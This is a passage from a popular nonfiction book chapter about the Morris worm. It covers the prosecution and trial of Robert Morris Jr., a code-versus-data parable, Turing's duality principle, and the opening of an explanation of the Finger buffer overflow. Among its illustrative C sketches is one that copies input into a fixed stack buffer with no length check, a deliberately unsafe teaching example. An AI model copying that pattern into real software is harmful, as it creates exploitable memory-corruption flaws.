While the Department of Justice dithered over whether to charge Robert Morris Jr. with a federal crime, the computer community split over whether it should. Eugene Spafford, an assistant computer-science professor at Purdue University, emerged as an antihacking crusader and forceful proponent of prosecution. “Some of those same people are claiming that Robert Morris should not be prosecuted because he did us a favor, and it was somehow our fault for not fixing the problems sooner,” Spafford wrote on an internet bulletin board. “That attitude is completely reprehensible! That is the exact same attitude that places the blame for a rape on the victim; I find it morally repugnant.”
Cornell University also strongly condemned Robert. M. Stuart Lynn, Cornell’s vice president of information technologies, channeled his inner schoolmarm: “We don’t consider it a great hack: it takes time away from productive work, and we don’t think it’s funny.” The Cornell president withheld his decision on whether to expel Robert, not wanting to influence the FBI. But the Feds were taking so long that he was forced to disclose it. The commission he convened to investigate the incident concluded that the hack was “a juvenile act that ignored the clear potential consequences” and recommended expulsion, which the president accepted. Robert was permitted to reapply the following year.
Others were more sympathetic. Robert’s defenders noted that his intentions were not malicious. The worm did not destroy files or cause permanent damage. Robert Morris was experimenting, and experimentation is the essence of hacker culture. And he exposed dangerous vulnerabilities and sloppy practices of network administrators, thereby making the internet safer. Peter Neumann predicted that history would vindicate Morris: “When all is said and done, this kid is going to come down as a folk hero.”
Paul Graham made the economic case for his friend’s unusual behavior. “The fact that the United States dominates the world in software is not a matter of technology,” he told The New York Times. “The culture for making great software is slightly crazy people working late at night.” If the United States wished to remain a technological superpower, it had to tolerate weird people doing weird things.
Robert Morris Jr. polarized the computer community not only over the ethics of hacking, but also over how to describe his hack. While the media called Morris’s creation a “worm,” some researchers insisted on calling it a “virus.” At conferences, whenever the worm people used “worm,” the virus people would yell, “Virus!”—as if they were at The Rocky Horror Picture Show shouting corrections at the movie screen.
Computer scientists also disagreed about the level of sophistication. Bob Morris had been impressed by his son’s coding prowess, claiming that only a few dozen people in the country could have pulled off a similar feat. Spafford, however, was dismissive: “One conclusion that may surprise some people is that the quality of the code is mediocre, and might even be considered poor.” Dexter Kozen, one of Robert’s professors, split the difference: “It took some technical wherewithal, but not necessarily brilliance.”
Several parts of the worm were pedestrian. The first attack vector—using trusted hosts to spread from computer to trusted computer—was an obvious tactic. The second attack vector—using the backdoor in SENDMAIL—also required little skill to perpetrate. This backdoor is easy to open once you know it’s there. The third vector—guessing passwords—is a brute-force attack that does not require much coding talent either. In fact, Morris’s father wrote about this type of attack in an article with Ken Thompson published in 1979.
The fourth vector—the attack on Finger—was inspired, however. Even Eugene Spafford was impressed. In a comment buried deep in the decompiled code that the UNIX administrators deciphered when dissecting the worm, Spafford conceded, “What this routine does is actually kind of clever.” We will examine this attack in this chapter, not to rate whether it was brilliant, competent, or poor, but because it is an excellent example of how hacking works in general and will serve as a template for understanding other types of attacks.
But before we explain how Robert Morris exploited the Finger program, we need to introduce some philosophy.
Achilles and the Tortoise
In 1895, Lewis Carroll—the pen name of the Anglican deacon Charles Dodgson, who wrote Alice’s Adventures in Wonderland—published a short, quirky article in the philosophy journal Mind entitled “What the Tortoise Said to Achilles.” The piece revisited the famous paradox of Zeno purporting to show that fleet-footed Achilles can never beat the sluggish Tortoise if the Tortoise is given a head start. In Zeno’s telling, Achilles can never win the race because whenever he’s about to catch up to the Tortoise, the Tortoise will have moved even closer to the finish line.
In Lewis Carroll’s version, Achilles can never beat the Tortoise in an argument. Every time Achilles tries to reach the end, the Tortoise adds another premise to the argument before Achilles can draw his inference.
As one would expect from Lewis Carroll, his take on the Tortoise-and-Achilles parable is not only clever, but also charming, written with his trademark Victorian wit and whimsy. I am therefore going to ruin it completely by transposing it into the modern world of digital computers.
The updated parable begins with Achilles taunting the Tortoise for being so old. “You’re so over the hill, my reptile friend, that you’re going to die any minute.” The Tortoise replies that Achilles is wrong (as well as ageist). He concedes to Achilles that he is a reptile. He also admits that all reptiles are mortal. The Tortoise claims, nevertheless, to be immortal.
To show that the Tortoise is indeed mortal, Achilles writes a computer program that solves logic problems. His program is primitive—Achilles is a fighter, not a coder.
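Here is a minimal sketch, in C, of what such a program might look like, with the two premises stored in variables A and B (the exact strings and structure are only illustrative, not Achilles’ actual listing):

/* Achilles' logic program, version 1.0 -- an illustrative sketch. */
#include <stdio.h>
#include <string.h>

int main(void) {
    char A[100], B[100];

    printf("Enter the premises:\n");
    fgets(A, sizeof A, stdin);   /* premise A, e.g., "The Tortoise is a reptile" */
    fgets(B, sizeof B, stdin);   /* premise B, e.g., "All reptiles are mortal"   */

    /* If both premises have been entered, print the conclusion. */
    if (strstr(A, "The Tortoise is a reptile") &&
        strstr(B, "All reptiles are mortal"))
        printf("The Tortoise is mortal\n");

    return 0;
}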
When Achilles runs his program, it prompts him to enter the premises of the argument. On his keyboard, Achilles types, “The Tortoise is a reptile” (call it premise A), hits Enter, types, “All reptiles are mortal” (premise B), and hits Enter again. The program prints out, “The Tortoise is mortal.”
Achilles is proud of himself for having beaten the Tortoise. As his logic program demonstrates, the conclusion “The Tortoise is mortal” follows from premises A and B.
The Tortoise points out that the conclusion that he is mortal follows from A and B only if the program is correct. But how do we know that the program prints out the right conclusion given the inputted premises? The Tortoise challenges Achilles to prove that he is mortal using a program that does not contain the code the Tortoise distrusts.
Achilles is confident that the Tortoise is mortal. After all, if the Tortoise is a reptile, and all reptiles are mortal, then surely the Tortoise is mortal. What could be more obvious than this?
Accordingly, Achilles deletes the line of code containing the Print statement. Here is his new program:
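In terms of the earlier sketch, version 2.0 might look like this, with everything the same except that the line printing the conclusion is gone:

/* Achilles' logic program, version 2.0 -- the Print statement deleted. */
#include <stdio.h>
#include <string.h>

int main(void) {
    char A[100], B[100];

    printf("Enter the premises:\n");
    fgets(A, sizeof A, stdin);
    fgets(B, sizeof B, stdin);

    /* The premises are still checked, but nothing is ever printed. */
    if (strstr(A, "The Tortoise is a reptile") &&
        strstr(B, "All reptiles are mortal")) {
        /* the line that printed "The Tortoise is mortal" used to be here */
    }

    return 0;
}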
When Achilles runs the revised program, nothing happens. He enters, “The Tortoise is a reptile” and “All reptiles are mortal,” but nothing prints out.
After debugging his logic program, version 2.0, Achilles discovers the problem. For his program to output a conclusion from the inputted premises, he needs downcode that will instruct the computer to print out the answer when it receives the premises it needs. By deleting the code with the Print command, he removed the instruction to furnish the conclusion.
Achilles tries a new tack. If the Tortoise cannot see that the original program is correct, Achilles will construct a new argument that makes the program’s logic even more explicit. (Call the new premise “C.”)
The Tortoise may not see how being mortal follows from A and B, Achilles thinks, but surely he’ll see how being mortal follows from A, B, and C. After all, C says that the Tortoise is mortal when A and B are true. If A, B, and C are true, then the Tortoise has to be mortal.
Excited by his new idea, Achilles writes two more lines of code:
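Continuing the sketch, the additions might look like the lines marked NEW: the program now also reads premise C and includes it in the test before printing the conclusion.

/* Achilles' logic program, version 3.0 -- premise C added. */
#include <stdio.h>
#include <string.h>

int main(void) {
    char A[100], B[100], C[100];

    printf("Enter the premises:\n");
    fgets(A, sizeof A, stdin);
    fgets(B, sizeof B, stdin);
    fgets(C, sizeof C, stdin);                                     /* NEW */

    if (strstr(A, "The Tortoise is a reptile") &&
        strstr(B, "All reptiles are mortal") &&
        strstr(C, "If A and B are true, the Tortoise is mortal"))  /* NEW */
        printf("The Tortoise is mortal\n");

    return 0;
}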
When Achilles runs version 3.0 of his program, and enters A, B, and C, he gets “The Tortoise is mortal,” as expected.
The Tortoise is unmoved. After all, this second program uses the same logic as the first one. And if the Tortoise doesn’t trust the first program, he won’t trust the output of the second program.
To oblige the Tortoise’s skepticism, Achilles deletes the line of code with the Print statement. Achilles is certain that the Tortoise’s being mortal follows from A, B, and C. All he needs to do is input these premises into his computer and it will draw the obviously correct inference. His new program looks like this:
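In terms of the sketch, version 4.0 would simply be version 3.0 with the Print statement deleted once more:

/* Achilles' logic program, version 4.0 -- version 3.0 minus the Print. */
#include <stdio.h>
#include <string.h>

int main(void) {
    char A[100], B[100], C[100];

    printf("Enter the premises:\n");
    fgets(A, sizeof A, stdin);
    fgets(B, sizeof B, stdin);
    fgets(C, sizeof C, stdin);

    if (strstr(A, "The Tortoise is a reptile") &&
        strstr(B, "All reptiles are mortal") &&
        strstr(C, "If A and B are true, the Tortoise is mortal")) {
        /* again, nothing left to do here */
    }

    return 0;
}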
Unsurprisingly, this new program fails. (After a couple more rounds with the Tortoise, Achilles tires and quits.)
What’s gone wrong here? To see how the Tortoise keeps tricking Achilles, let’s discuss the difference between code and data.
Code and Data
Let’s start with code. Code is a set of instructions, such as “Add,” “Print my résumé,” and “Shut the door.” Code is active—it tells someone or something to perform actions under certain conditions.
Achilles’ program, for example, tells the computer to print “The Tortoise is mortal” if “The Tortoise is a reptile” and “All reptiles are mortal” are inputted.
The opposite of code is data. While code is active, data is passive. It does not act—it is acted upon. It is inputted into code for processing. Thus, the instruction “__ + __” can take 2 and 2 as data. When run (or, as computer people say, executed), the code returns the number 4.
The premises of the Tortoise’s argument—A, B, and C—are the data. It is a datum that the Tortoise is a reptile. It is another datum that all reptiles are mortal. These data are fed into the computer in a language the computer understands for processing by its downcode.
Code and data are not interchangeable because they have different functions. Code is supposed to act; data is supposed to be acted upon. If you take code and treat it like data, you are removing something that acts. It is no surprise that Achilles’ program failed without its main line of code.
The danger of confusing data and code is high because code often looks like data and vice versa. Compare these two statements (for clarity, code symbols are darker font, data symbols in lighter italics):
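Rendered in terms of the earlier C sketches (with the code/data distinction marked in comments rather than fonts), the pair might look roughly like this:

/* An illustrative rendering of the two statements. */
#include <stdio.h>
#include <string.h>

int main(void) {
    char A[100] = "The Tortoise is a reptile";
    char B[100] = "All reptiles are mortal";

    /* Statement 1 -- code: an instruction to print the conclusion
       whenever the two premises have been entered. */
    if (strstr(A, "The Tortoise is a reptile") &&
        strstr(B, "All reptiles are mortal"))
        printf("The Tortoise is mortal\n");

    /* Statement 2 -- data: premise C, which merely asserts that if
       "The Tortoise is a reptile" and "All reptiles are mortal" are
       true, then "The Tortoise is mortal" is true.  Stored here as a
       plain string, it instructs the computer to do nothing. */
    const char *C =
        "If the Tortoise is a reptile and all reptiles are mortal, "
        "then the Tortoise is mortal.";
    (void)C;

    return 0;
}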
Both look similar. The first statement says that if the user inputs “The Tortoise is a reptile” and “All reptiles are mortal,” the program should print “The Tortoise is mortal.” The second statement, which is the same as premise C from the last example, says that if “The Tortoise is a reptile” and “All reptiles are mortal” are both true, then “The Tortoise is mortal” is also true.
The difference between these statements is conspicuous. The first one is code because it contains an instruction: if certain conditions are true, then print “The Tortoise is mortal.” The second statement, on the other hand, doesn’t direct the computer to do anything. It simply states a relationship between the truth of certain sentences, namely, if A and B are true, then “The Tortoise is mortal” is also true. The second statement, therefore, is data.
Code can look almost exactly like data. Compare these two statements:
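In a C-flavored sketch, the contrast might be rendered like this; the second statement appears only as a comment because it is not an instruction at all:

int main(void) {
    /* Statement 1 -- code: an instruction telling the computer to make
       the variable B hold the string "All reptiles are mortal". */
    const char *B = "All reptiles are mortal";
    (void)B;

    /* Statement 2 -- data: the bare sentence

           All reptiles are mortal

       It tells no one to do anything; it simply states what is the case. */
    return 0;
}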
At first glance, the first statement looks like data. It says that B is the statement “All reptiles are mortal,” which looks just like the statement below it. But they are not equivalent. The first statement is code because it instructs the computer to assign a value to B, namely, to make B be the string “All reptiles are mortal.” The second, by contrast, is data because it doesn’t tell anyone to do anything: it states a datum; it tells us what is the case. It simply says that all reptiles are mortal.
Code instructs, data represents. If you want to take some action based on conditions, use code. If you want to represent a state of the world, use data. Mix the two up and you’re in trouble.
The moral of the Tortoise-Achilles fable, therefore, is that code and data are not interchangeable. If you take some downcode out and input it as data, your new program is unlikely to run correctly. Achilles’ logic program cannot function without some code instructing the computer to print out a conclusion when the premises are entered. Converting a line of code into premise C is not sufficient because C doesn’t instruct the computer to do anything. It is just a statement, not an instruction. You can input as many premises as you want into a logic program. But if the program doesn’t have code to draw inferences, it will be useless.
As we will see, that’s precisely how Robert Morris hacked the Finger service. He fed the program code (the bootstrap program for the worm) when it was expecting data (a username). Robert Morris was the Tortoise, and the rest of the computer community was Achilles.
Criminal Upcode
In the early 1970s, the criminal law in the United States had no computer-specific offenses. To deal with the new problem of computer hacking, prosecutors were forced to improvise with existing upcode. One possible crime to use was trespass. Just as I commit trespass when I pass onto your property without your consent, a hacker commits trespass when breaking into a computer account without the user’s permission.
Unfortunately, the crime of trespass is a bad fit for hacking. Here, for example, is the New York State trespass statute:
§140.10 Criminal trespass: A person is guilty of criminal trespass in the third degree when he knowingly enters or remains unlawfully in a building or upon real property.
This statute is typical in that it makes trespass a physical crossing of a border, or physical presence in a building, in violation of the law. It is so explicit about its physicality—the offender must enter or remain in any building or real property—that hackers violate the statute only when they literally climb into the computer.
Courts were more amenable to theft as a charge for hacking. Just as I might steal your wallet when in your house, hackers can steal information when they break into computer accounts without permission. Robert Morris Jr. could not be charged with theft, however, because he did not steal any information.
Had Robert released his worm a few years earlier, he might have evaded the attention of the FBI. However, Congress made prosecuting hackers far easier when it enacted the Computer Fraud and Abuse Act (CFAA) in 1986. The CFAA created two tiers of offenses—certain computer intrusions were deemed misdemeanors, punishable by fine and/or up to a year in jail, whereas others were treated as felonies, with punishments including fines and/or five to twenty years in jail.
The two most plausible charges against Robert Morris Jr. were Section (a)(3) of the CFAA, which criminalized as a misdemeanor the mere intrusion into a government computer—a form of computer trespass—and Section (a)(5), which prohibited as a felony any such intrusion causing a loss of at least $1,000, punishable by up to five years. Given the amount of maintenance and repair generated by the worm, the monetary damage easily exceeded $1,000.
The Department of Justice could not decide whether to charge Robert with the misdemeanor, Section (a)(3), or the felony, Section (a)(5). Many considerations counseled leniency. Robert did not mean to cause the damage and was horrified when he found out that he had. Morris was a young man with no criminal history; he was not motivated by profit; he was not in the service of a foreign government; and he took measures to stop the harm he was causing. And yet, for all the mitigating circumstances, there was no getting around the fact that Robert Morris Jr. had intentionally released malicious code on the internet and caused an enormous amount of damage. A lenient charge would send the wrong signal. If the biggest hack in internet history counted as a mere misdemeanor, the DOJ would not appear to take the CFAA seriously.
The concerns were not just of law enforcement policy, but also of legal interpretation. In contrast to computer downcode, which is formal and can be parsed in only one way, legal upcode is informal and thus subject to alternative constructions. For example, Section (a)(5) made it a crime if any person “intentionally accesses” a federal-interest computer without authorization and causes losses of more than $1,000. Morris intentionally accessed such computers without authorization—that was indisputable—but he denied he intentionally caused damage. Did Section (a)(5) require intentional access without authorization and the intentional causing of damage? If so, then Robert had not committed a felony. But if the provision required only intent for access, but not for damage, then he could be charged with the more severe offense.
Despite rumors that federal prosecutors would offer Robert the chance to plead guilty to a misdemeanor, they ultimately decided to charge Morris with a felony. On July 26, 1989, a grand jury in Syracuse, New York, approved a one-count indictment, alleging that on November 2, 1988, Robert Tappan Morris Jr. “intentionally and without authorization” accessed computers at institutions such as UC Berkeley, NASA, and the US Air Force, “prevented the authorized use” of these computers, and “caused a loss” of at least $1,000.
Robert, his lawyer, and his family trekked up from Maryland to the federal courthouse in Syracuse for the arraignment. Robert pleaded not guilty. The trial was scheduled to begin in the dead of winter.
Jury as a Computer
Given that few Americans had heard of the internet before the Morris Worm, and that the indictment charged the defendant with a new crime, any jury would have difficulties sorting through the facts of the case, applying the law, and rendering a verdict. But the lawyers in the case faced an even bigger problem: not one juror owned a computer, and only two had ever used one at work. Robert Morris did not get a jury of his peers. He got a jury of noobs.
Fortunately for the government, Mark Rasch was an experienced prosecutor in the field of computer crime—perhaps the most experienced in the country. A graduate of the Bronx High School of Science, he was one of the few lawyers at the Department of Justice who worked on computer crimes. And as a native of upstate New York—having been born in Rochester and gone to law school in Buffalo—Rasch was confident yet affable, an ideal combination for addressing the Syracuse jury.
Rasch specialized in addressing juries of laypeople. He was able to bypass the technicalities of computer hacking and make jurors understand the issues at stake. He began his opening statement on January 9, 1990, with a powerful presentation of the case: “The government will prove beyond a reasonable doubt … that there was a full-scale assault on the computers throughout the United States, launched by the defendant, Robert Tappan Morris, on November 2, 1988.” Robert Morris’s full-scale assault was so dangerous, Rasch explained, because important people use the internet for important jobs. “These people maintained these computers not just at government sites, not just at military sites, but at commercial facilities, at private companies throughout the country, and many of the people you will hear testimony from worked at different universities doing scientific research. Their research was interrupted. They couldn’t do their work because of the actions of the defendant, Robert Tappan Morris. Valuable computer time was lost. Valuable experiments were lost.”
Rasch used well-chosen analogies to help the jurors understand how the worm functioned. He equated computer passwords, which most jurors had never used, with “the PIN number that you use when you go to the banking machine.” He explained the worm using a medical analogy: “Just like with a regular virus, if you just have one virus, you may not get very sick, but if you get many viruses, if you have hundreds, you will get very sick. Not only will you get very sick, you will get other people sick.”
Rasch understood, however, that he did not need to teach the jurors exactly how the internet, computers, or worms worked. He merely needed to convince them beyond a reasonable doubt that the conditions in the criminal code were met—which he planned to do by calling a long list of computer administrators as witnesses to testify that Morris’s worm accessed their computers without authorization, prevented their use, and caused them to waste significant time, effort, and money. For the most part, the jurors could trust these experts.
The case of United States v. Robert Tappan Morris was challenging not only because it concerned advanced technology with which the jurors had little to no experience. The criminal law was technical as well, and the jurors had to process its requirements, too. Rasch, therefore, spent part of his opening argument examining the technical requirements of the upcode set out in Section (a)(5) of the CFAA—what lawyers call the “elements” of the crime. The government intended to prove beyond a reasonable doubt that “Robert Tappan Morris, intentionally and [1] without authorization [2] accessed these computers … and by that means [3] prevented the authorized use of those computers … and [4] thereby caused a loss, and I will tell you about that in just a moment, a loss of at least one thousand dollars.”
Using experts, Rasch sought to establish that Robert Morris satisfied the four elements set out in the statute. These experts could not, however, credibly testify to Robert Morris’s state of mind, namely, that he broke into the computers intentionally. They could not establish what lawyers call mens rea—a guilty mind. To do so, Rasch planned on calling Paul Graham and Andy Sudduth to testify and establish for the jury that their friend acted deliberately.
Rasch was careful to add that he did not regard Robert Morris as “evil.” “The government does not intend to prove that Mr. Morris intended to cause this loss.” But that Morris was not planning on crashing the internet was legally immaterial—all that mattered was that he intended to break into computers and that a loss resulted.
Rasch’s case was considerably aided by the fact that his adversary, Morris’s attorney, Thomas Guidoboni, did not contest his story. Guidoboni fully conceded that Robert Morris Jr. did what Rasch said he did.
In his opening statement, Guidoboni tried to minimize the harm his client caused by challenging Rasch’s solemn depiction of the internet. “You will hear evidence that such majestic uses as playing chess, sending love letters, sending recipes, this kind of thing—graduate students basically could use it to send these kinds of messages: ‘Hello, how are you?’ ‘We have hockey practice today.’ ‘I just got back from vacation.’ And a lot of time was used for that.” Aside from several small qualifications, Guidoboni accepted the facts of the prosecution’s case; what he contested was its interpretation of the law. While Guidoboni admitted that his client intentionally built and released the worm, he claimed that the damage he caused was unintentional. And because the success of the worm was a mistake, it wasn’t a crime. “Now we submit to you, however, that a simple mistake, a mistake together with embarrassment and some inconvenience, are not the equivalent of a federal felony offense.”
The defense strategy turned the normal legal procedure upside down. Trials are supposed to focus on the facts, not the law. The judge supplies the legal upcode, the attorneys contest the data provided by witnesses and other evidence. The principal question of every criminal trial is whether the prosecution has shown beyond a reasonable doubt that the factual conditions set out in the legal upcode are satisfied. If so, jurors are obligated to return a verdict of guilty; otherwise, they must return not guilty.
Juries, we might say, are like legal computers. The judge loads the upcode, the attorneys supply the data, and the jury outputs a verdict. Whereas trials are normally about data, Guidoboni turned this one into a debate about code. Should the law punish a hacker who merely released a worm onto the internet but did not intend to cause damage? Or should the law deem the unintended damage a “mistake” and hence not punishable as a felony?
Guidoboni wanted the jury to follow his lead on the law. Unfortunately, the judge, Howard Munson, had ruled otherwise before the trial even began. On Judge Munson’s interpretation, an intention to cause damage was unnecessary for a felony conviction. He was almost certainly going to instruct the jury to follow his interpretation of the law at the end of the trial.
Guidoboni’s strategy, therefore, was for the jury to ignore the judge and follow Guidoboni instead. This risky gambit—to hope that the jury malfunctioned in such a fundamental way—was the only option he had.
The Ambiguity of Code and Data
The lesson of Lewis Carroll’s parable of the Tortoise and Achilles is never to confuse code with data. Since the two have different functions, swapping one for the other usually ends badly, with the program crashing.
Code and data not only have different functions. They are also assessed by different standards. Code can be good or bad. It can carry out its function either well or poorly. Or the goal it aims to achieve can be either valuable or pernicious. Data, on the other hand, cannot be good or bad. It can only be true or false. It makes no sense to ask if the data is good—you can ask only whether it correctly represents the world. If so, it is true, accurate, or correct; if not, it is false, erroneous, or flawed.
The differences between code and data are so fundamental that one would think that we can distinguish the two just by looking at them. Does a statement give an instruction? Then it’s code. Does the statement represent reality? Then it’s data. Case closed.
Not so fast. As Alan Turing showed in 1936, any expression that represents code or data can be turned into a number. Call this the “duality principle.” The duality principle maintains that code and data can both be represented by numerical symbols. Since numerical symbols can represent either code or data, one cannot tell which they represent just by looking at them.
That data can be represented by numbers is obvious (e.g., current temperature = 80°). That code can be represented by numbers is less so. But as Turing demonstrated, converting code to numbers is surprisingly simple.
To see how a statement containing an instruction can be turned into a number, and then into a binary string, imagine an encoding scheme that assigns a unique number to every symbol a program might contain. Pick a line of code, take each symbol in that line, and replace it with its number under the scheme.
The resulting sequence of numbers encodes the instruction from Achilles’ first program. While it looks like a sequence of data, it was constructed from code, from an instruction to print “The Tortoise is mortal” if A and B are entered. We can even take this sequence and compress it into a single number. (Mathematical details are in the endnote. You’re welcome.) That number turns out to be 23,240,679,795,235,306,981,511,472,582,645,791,189,105,998,211,999,427,866, or over twenty-three septendecillion two hundred forty sexdecillion. We can then convert this decimal number into a binary string:
1111001010100101010010101100011011001101000110111010011101011001110011000011111010100010010010101000011000010111110111101000111111001100011100110000111100101111110011001011111000100011
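The procedure can be sketched in C, with the standard ASCII code standing in for the encoding scheme imagined above (ASCII assigns different numbers from the ones quoted, but the principle is identical): each symbol in a line of code is matched with a number, and each number with a string of bits.

/* Turn a line of code into numbers, and the numbers into bits. */
#include <stdio.h>

int main(void) {
    const char *line = "if (A && B) print(\"The Tortoise is mortal\")";

    for (const char *p = line; *p != '\0'; p++) {
        printf("'%c' -> %3d -> ", *p, *p);        /* symbol and its number */
        for (int bit = 7; bit >= 0; bit--)        /* the number in binary  */
            putchar(((*p >> bit) & 1) ? '1' : '0');
        putchar('\n');
    }
    return 0;
}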
Turing’s discovery that code can be converted to numbers was nothing short of revolutionary, for it made digital computing possible. Because numbers can represent code or data, the principle of duality allows programmers to use the same zeros and ones to input data and code into their digital computers.
Digital computers are especially good at manipulating binary numbers. High-voltage circuits within microchips represent ones; low-voltage circuits represent zeros. Thus, using Turing’s procedure, programmers can take their code, transform it into binary numbers, and load these binary expressions onto integrated circuit chips. Our personal computers—desktops, laptops, phones—can run the programs we load onto them, provided those programs have been transformed into strings of zeros and ones that the machines can understand.
The duality principle—that numbers can represent either code or data—is a core part of the metacode upon which the entire digital world rests. It is also one of the most important philosophical discoveries of the twentieth century. Duality is especially remarkable metacode given that, as the Achilles and the Tortoise fable showed us, code and data have opposing natures. One is active, the other passive. One acts; the other is acted upon. One changes the world; the other represents it. And yet both code and data can be represented by the very same kinds of symbols, i.e., numerals. Indeed, because all numbers can be represented by binary strings, these opposites can be represented by just two numerals, 0 and 1.
That binary strings can represent code not only makes general digital computing possible; it also defines a hard upper limit on what computers can possibly do. Computers will never be able to solve many problems—an uncountably infinite number of problems, to be precise—as we will see later in this book. Indeed, the very purpose of Turing’s 1936 paper, in which he constructed a universal machine capable of running any program, was to show the limits of computation.
But before we can explore the philosophical implications of this metacode, we have a more basic question to ask: If code can be turned into numbers, just like data, how is the computer supposed to know whether a string of zeros and ones is supposed to be code or data? For example, the twenty-three-septendecillion number above, written in binary, might represent the encoding of a line from Achilles’ program. Or it might represent data, say, the number of stars in the universe, or the number of atoms in the period at the end of this sentence. How should the computer interpret this sequence of zeros and ones?
This question is especially pressing in light of the Tortoise and Achilles parable. The moral of that story was never to confuse code and data. Since code and data do very different things, mistaking one for the other can cause calamity. How then can computers avoid the fate of Achilles, trying to use data when only code will do?
The answer is that we tell the computer which binary strings are code and which are data. Robert, for example, told his computer that the worm was code by naming its file worm.c, the .c extension indicating the programming language, C, in which he wrote it. When we store our text documents in files with .txt extensions, we are telling our operating system that they contain data in the form of text.
Thus, when we designate files as code, the computer loads the information into a special memory location known as the code segment. Likewise for files designated as data, which are loaded into the data segment. The code and data segments are kept separate.
Thus, even though physical symbols are intrinsically ambiguous between code and data, humans disambiguate them for computers. They tell the computer which binary expressions should be interpreted as code and which as data. Once programmers supply the right interpretation, computers load code into one part of memory and data into another.
When the operating system runs code, it identifies the instruction to be executed by using an “instruction pointer.” Instruction pointers act like conductors pointing their batons to different sections of the orchestra when their turn comes.
It is crucial that instruction pointers never point to the data segment. If they do, the computer’s central processing unit interprets the numbers there as code. But since the programmer intended for them to be data, the numbers would be meaningless to the CPU and would cause the program to crash.
Instruction pointers, therefore, are all that stand between the computer’s operating as the programmer intended and its failing. Here is where hackers have their opportunity. They feed malicious code to a program that is expecting innocuous data, then change the instruction pointer to point to the newly introduced code—which, as we shall now see, is how Robert Morris hacked the Finger service.
Overflow!
Before cell phones and Facebook, getting ahold of friends on campus wasn’t easy. If no one within earshot knew where someone was, the best strategy was to use the university landline (what used to be called a phone) to ring that person’s dorm room. If that person didn’t pick up, you would head down to the computer room, log on to the campus network, and “finger” them. (It didn’t sound bad then.) Finger is no longer in use, but for a long time it was the best way to find people on campus.
Suppose that Paul Graham wanted to finger Robert Morris to see whether he was on the Harvard campus. He would type “finger rtm” into his UNIX machine. If Robert was on the network, Finger would respond with his location. It was fast, easy, and worked remarkably well. That is, until Robert Morris figured out how to exploit the Finger program to break into Finger servers.
When someone submits a Finger request, a Finger client sends a request to a Finger server. A client is a program that makes requests, and a server is a program that responds to requests. The Finger server takes the request from the client (the input, e.g., “rtm”), looks up the location of the person in its database of users, and “serves” the location back to the client (the output, e.g., “Aiken Lab, Machine 3”). The server is the code; the input and output are the data.
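The protocol itself is tiny. A bare-bones Finger client might look like the following sketch: the server listens on TCP port 79, the client sends the username followed by a carriage return and newline, and the server answers with plain text. (Almost no machine runs a Finger server anymore, so treat this as an illustration of the request-and-response pattern.)

/* A bare-bones Finger client: send a username, print the reply. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>

int main(int argc, char *argv[]) {
    if (argc != 3) {
        fprintf(stderr, "usage: %s user host\n", argv[0]);
        return 1;
    }

    struct addrinfo hints = {0}, *server;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(argv[2], "79", &hints, &server) != 0)   /* port 79 */
        return 1;

    int fd = socket(server->ai_family, server->ai_socktype, server->ai_protocol);
    if (fd < 0 || connect(fd, server->ai_addr, server->ai_addrlen) < 0)
        return 1;

    char request[256];                       /* the request: "rtm\r\n" */
    snprintf(request, sizeof request, "%s\r\n", argv[1]);
    write(fd, request, strlen(request));

    char reply[512];                         /* print the server's answer */
    ssize_t n;
    while ((n = read(fd, reply, sizeof reply)) > 0)
        fwrite(reply, 1, (size_t)n, stdout);

    close(fd);
    freeaddrinfo(server);
    return 0;
}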
Enter the second principle of metacode, which I will call “physicality.” The physicality principle states that computation is a physical process of symbol manipulation. Your laptop, cell phone, and brain are all symbol-manipulation machines.
Physical symbol manipulation sounds complicated, but there is no mystery here. Indeed, we spend most of our early lives learning how to do it. When we are taught how to add in elementary school, we are learning how to manipulate physical symbols. (Starting from the right, add the column and write the sum below, write any carry number above the next column, add these digits…)
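That grade-school procedure can itself be written as a short program that does nothing but manipulate digit symbols, column by column; the numbers below are arbitrary examples:

/* Column-by-column addition: pure symbol manipulation, with carries. */
#include <stdio.h>
#include <string.h>

int main(void) {
    const char *a = "478";
    const char *b = "256";
    char digits[64];
    int i = (int)strlen(a) - 1, j = (int)strlen(b) - 1, k = 0, carry = 0;

    while (i >= 0 || j >= 0 || carry) {
        int column = carry;
        if (i >= 0) column += a[i--] - '0';      /* the symbol '8' stands for 8 */
        if (j >= 0) column += b[j--] - '0';
        digits[k++] = (char)('0' + column % 10); /* write the digit below       */
        carry = column / 10;                     /* carry into the next column  */
    }

    printf("%s + %s = ", a, b);
    while (k > 0)                                /* digits came out right to    */
        putchar(digits[--k]);                    /* left; print them in order   */
    putchar('\n');
    return 0;
}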
Since computers are physical machines for manipulating symbols, they are subject to physical limits. No computer, for example, can store an infinite number of symbols because no computer can have an infinite memory. Code and data are stored in finite memory spaces, big enough to get the job done, but not so big as to waste capacity that other programs or users can use.
When a user enters a username to look up, the Finger server temporarily stores it in a part of memory known as a data buffer. The data buffer is 512 bytes long. That’s generous. Robert Morris Jr.’s username—rtm—is only three bytes long (each character is a byte). No matter the size of the request, however, Finger stores the string in the 512-byte-long buffer, usually with plenty of room to spare. The Finger server then looks up the request in its database to see if the user is on the network.
That’s how it is supposed to work. But the programmer who built that version of Finger made a mistake. While Finger allows for a request up to 512 bytes long, it does not check to see if the request is over the limit. When a longer string is entered, Finger still tries to jam the oversize information into the data buffer. Like ten ounces poured into an eight-ounce measuring cup, the extra information spills over into adjacent parts of memory. This spillage is known as a buffer overflow.
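The class of bug can be sketched in a few lines of C. This is an illustration of the general pattern rather than the actual Finger source: a fixed 512-byte buffer on the stack, filled from the request with no length check.

/* A sketch of an unchecked copy into a fixed-size stack buffer. */
#include <stdio.h>
#include <string.h>

void handle_request(const char *request) {
    char buffer[512];            /* the 512-byte data buffer on the stack     */
    strcpy(buffer, request);     /* no length check: a request longer than    */
                                 /* 512 bytes spills past the buffer into     */
                                 /* whatever sits next to it in memory        */
    printf("looking up user: %s\n", buffer);
}

int main(void) {
    handle_request("rtm");       /* a normal, three-byte request */
    return 0;
}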
Any such buffer overflow can overwrite important information, depending on the location of the data buffer. The server stored the data buffer in a special part of the computer’s memory known as the stack. The stack is like the scratch paper at the back of a math notebook. If the math problem is long, students will often dog-ear the page they are working on and turn to the back of the notebook to do the intermediary calculations. When they get the answer, they return to the front of the notebook and enter the answer on the dog-eared page.
When code fetches data, it temporarily places the data on the stack— jotting it down on the back pages of the computer’s memory, as it were. The code will use the stack to perform intermediate calculations. Once completed, the program will transfer the answer back to the “front pages” to continue its operations.
